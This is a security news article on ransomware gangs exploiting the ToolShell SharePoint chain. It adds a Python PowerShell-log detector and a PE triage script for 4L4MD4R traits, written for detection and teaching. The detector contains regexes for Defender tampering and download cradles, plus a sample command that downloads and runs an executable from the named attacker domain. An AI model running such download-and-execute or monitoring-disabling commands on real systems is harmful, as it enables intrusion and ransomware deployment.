**Ransomware Gangs Join Forces to Target Microsoft SharePoint Servers**

Ransomware gangs have joined the ongoing wave of attacks exploiting a vulnerability chain in on-premises Microsoft SharePoint servers, piling onto the same exploit that state-linked actors have been using. The ToolShell chain, which has been linked to Chinese threat actors, has already been used to breach at least 148 organizations worldwide, among them numerous high-profile targets.

According to security researchers at Palo Alto Networks' Unit 42, a new ransomware variant dubbed 4L4MD4R was discovered in July. Researchers spotted it after a failed exploitation attempt exposed malicious PowerShell commands that disabled security monitoring on the targeted device and fetched a loader; that loader in turn downloads and executes the ransomware from theinnovationfactory[.]it (145.239.97[.]206).
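The PowerShell activity described above is the kind of thing that shows up in script-block logging (Windows event 4104) well before any ransomware runs. The script below is an added example, not Unit 42's tooling or code from this article: it flags logged script blocks that tamper with Defender monitoring, use a download cradle, or reference the loader infrastructure named above. The article does not say which command the attackers used to disable monitoring, so the `Set-MpPreference` patterns are an assumption about what such commands usually look like, and the log lines are constructed, not real telemetry.

```python
"""Flag PowerShell script-block log entries (event 4104) that disable
Defender monitoring or reach the 4L4MD4R loader infrastructure.

Added example; not code from Unit 42 or the article. Sample events are
constructed. The tampering patterns are an assumption: the article only
says the commands "disabled security monitoring".
"""
import re

# Indicators quoted in the article, kept defanged in source.
IOC_DOMAIN = "theinnovationfactory[.]it"
IOC_IP = "145.239.97[.]206"


def refang(ioc):
    """Turn a defanged indicator back into the form found in logs."""
    return ioc.replace("[.]", ".")


# Assumed Defender-tampering commands (Set-MpPreference is the real cmdlet).
TAMPER_PATTERNS = [
    re.compile(r"Set-MpPreference\s+-Disable\w*Monitoring\s+\$?true", re.I),
    re.compile(r"Set-MpPreference\s+-DisableIOAVProtection\s+\$?true", re.I),
    re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
]
# Common download cradles used to pull a second-stage loader.
CRADLE_PATTERN = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)


def analyze_script_block(text):
    """Return the reasons a script block looks suspicious (empty if clean)."""
    reasons = []
    if any(p.search(text) for p in TAMPER_PATTERNS):
        reasons.append("defender_tampering")
    iocs = [i for i in (refang(IOC_DOMAIN), refang(IOC_IP)) if i in text]
    if iocs:
        reasons.append("known_ioc:" + ",".join(iocs))
    if CRADLE_PATTERN.search(text):
        reasons.append("download_cradle")
    return reasons


def scan_events(events):
    """events: iterable of (event_id, ScriptBlockText). Returns the hits."""
    hits = []
    for event_id, text in events:
        if event_id != 4104:  # only script-block logging carries the full text
            continue
        reasons = analyze_script_block(text)
        if reasons:
            hits.append({"text": text, "reasons": reasons})
    return hits


# Constructed sample events; the URL path is a placeholder, not a real IOC.
SAMPLE_EVENTS = [
    (4104, "Get-ChildItem C:\\inetpub\\wwwroot"),
    (4104, "Set-MpPreference -DisableRealtimeMonitoring $true"),
    (4104, "Invoke-WebRequest -Uri http://" + refang(IOC_DOMAIN)
           + "/stage2.exe -OutFile C:\\Users\\Public\\svc.exe; "
             "Start-Process C:\\Users\\Public\\svc.exe"),
    (4103, "Set-MpPreference -DisableRealtimeMonitoring $true"),
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["reasons"], "<-", hit["text"][:60])
```

On a real SharePoint host the source is the Microsoft-Windows-PowerShell/Operational log with script-block logging enabled; the same logic applies to EDR telemetry. The IOC match is the high-confidence signal here, while the tampering and cradle patterns are broader and will also catch unrelated admin activity, so treat them as triage leads rather than verdicts.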

**The 4L4MD4R Ransomware Variant**

Analysis of the 4L4MD4R payload showed that it is written in Go and packed with UPX. When run, the sample decrypts an AES-encrypted payload in memory, allocates memory for the decrypted PE file, and starts a new thread to execute it. The ransomware encrypts files on the compromised system, drops ransom notes and lists of the encrypted files, and demands a payment of 0.005 Bitcoin.
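The two static traits Unit 42 reports, UPX packing and a Go toolchain, are cheap to confirm before any dynamic analysis. The script below is an added example rather than Unit 42's tooling or anything from the article: it reads the PE section table with the standard library only, checks for the UPX section names and the `UPX!` header magic, and looks for the build-info markers the Go compiler leaves in a binary. A minimal PE image is constructed in memory so the script runs offline; nothing in it is derived from the real sample.

```python
"""Static triage for the traits attributed to the 4L4MD4R payload:
a UPX-packed PE written in Go. Added example, not Unit 42's code.
The sample PE built below is constructed for the demo and is not
executable; it only has the headers the parser needs.
"""
import struct

UPX_SECTIONS = {b"UPX0", b"UPX1", b"UPX2"}
UPX_MAGIC = b"UPX!"
# Strings the Go linker embeds (build ID and the buildinfo blob header).
GO_MARKERS = (b"Go build ID:", b"Go buildinf:", b"runtime.goexit")


def pe_section_names(data):
    """Return the section names of a PE image, or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_opt             # section table follows optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                 # each IMAGE_SECTION_HEADER is 40 bytes
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def triage(data):
    """Summarise packing and toolchain hints for a PE image."""
    names = pe_section_names(data)
    return {
        "sections": names,
        "upx_packed": any(n in UPX_SECTIONS for n in names) or UPX_MAGIC in data,
        # Go markers live in the compressed body of a packed file, so this
        # is only meaningful after `upx -d` (or a memory dump).
        "go_binary": any(m in data for m in GO_MARKERS),
    }


def build_sample_pe(section_names, tail=b""):
    """Construct a minimal PE image (constructed test data, not a real file)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew -> 0x40
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 0, 0x22)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + sections + tail


if __name__ == "__main__":
    packed = build_sample_pe([b"UPX0", b"UPX1", b".rsrc"], tail=UPX_MAGIC)
    unpacked = build_sample_pe([b".text", b".data"], tail=b"\xffGo buildinf:\x08\x02")
    print("packed  :", triage(packed))
    print("unpacked:", triage(unpacked))
```

Both checks are heuristics: attackers can rename UPX sections and strip the magic, and a packed file hides the Go markers until it is unpacked, which is why a UPX hit with no Go hit should prompt unpacking rather than a verdict that the sample is not Go.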

**Microsoft and Google Link ToolShell Attacks to Chinese Threat Actors**

Microsoft has attributed the ToolShell attacks to three groups: two Chinese state-sponsored actors it tracks as Linen Typhoon and Violet Typhoon, and a third China-based actor tracked as Storm-2603. Google's Mandiant has likewise said that at least one of the actors behind the early exploitation is a China-nexus threat actor. Victims include the U.S. National Nuclear Security Administration, the Department of Education, Florida's Department of Revenue, and government networks in Europe and the Middle East.

**The Scope of the Attacks**

Dutch cybersecurity firm Eye Security was the first to detect ToolShell exploitation in zero-day attacks chaining CVE-2025-49706 and CVE-2025-49704, initially identifying 54 compromised organizations, including government entities and multinational companies. Check Point Research subsequently reported signs of exploitation dating back to July 7, aimed at government, telecommunications, and technology organizations across North America and Western Europe.

**The True Scope of the Attacks**

According to Eye Security Chief Technology Officer Piet Kerkhofs, the actual scope extends far beyond initial estimates, with the firm's data indicating that the attackers have infected at least 400 servers with malware across the networks of at least 148 organizations, many of which have been compromised for extended periods.

**CISA Orders Federal Agencies to Secure Their Systems**

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-53770, the remote code execution flaw in the ToolShell exploit chain, to its Known Exploited Vulnerabilities catalog and ordered federal agencies to secure their systems within 24 hours.

**Microsoft Releases Emergency Patches for SharePoint RCE Flaws**

In response to the ongoing attacks, Microsoft released emergency out-of-band patches for CVE-2025-53770, a remote code execution flaw, and CVE-2025-53771, a spoofing flaw. The two are variants of CVE-2025-49704 and CVE-2025-49706, which had been fixed in the July Patch Tuesday updates, and together they form the chain the ToolShell attackers used in the wild. The updates are available through the Microsoft Update Catalog. Patching alone does not evict an attacker who is already inside: Microsoft also advises rotating the ASP.NET machine keys and restarting IIS after the update, because the attackers steal those keys and can keep forging valid requests to a patched server until the keys change.

**Conclusion**

The ToolShell campaign shows how quickly a patched bug can return as a patch-bypass zero-day, and how fast ransomware crews pile onto an exploit chain once it is public. With at least 400 servers infected across at least 148 organizations, many of them compromised for extended periods, administrators of on-premises SharePoint servers should apply the emergency updates, rotate machine keys, and hunt for signs of earlier compromise rather than assume the patch alone closed the door.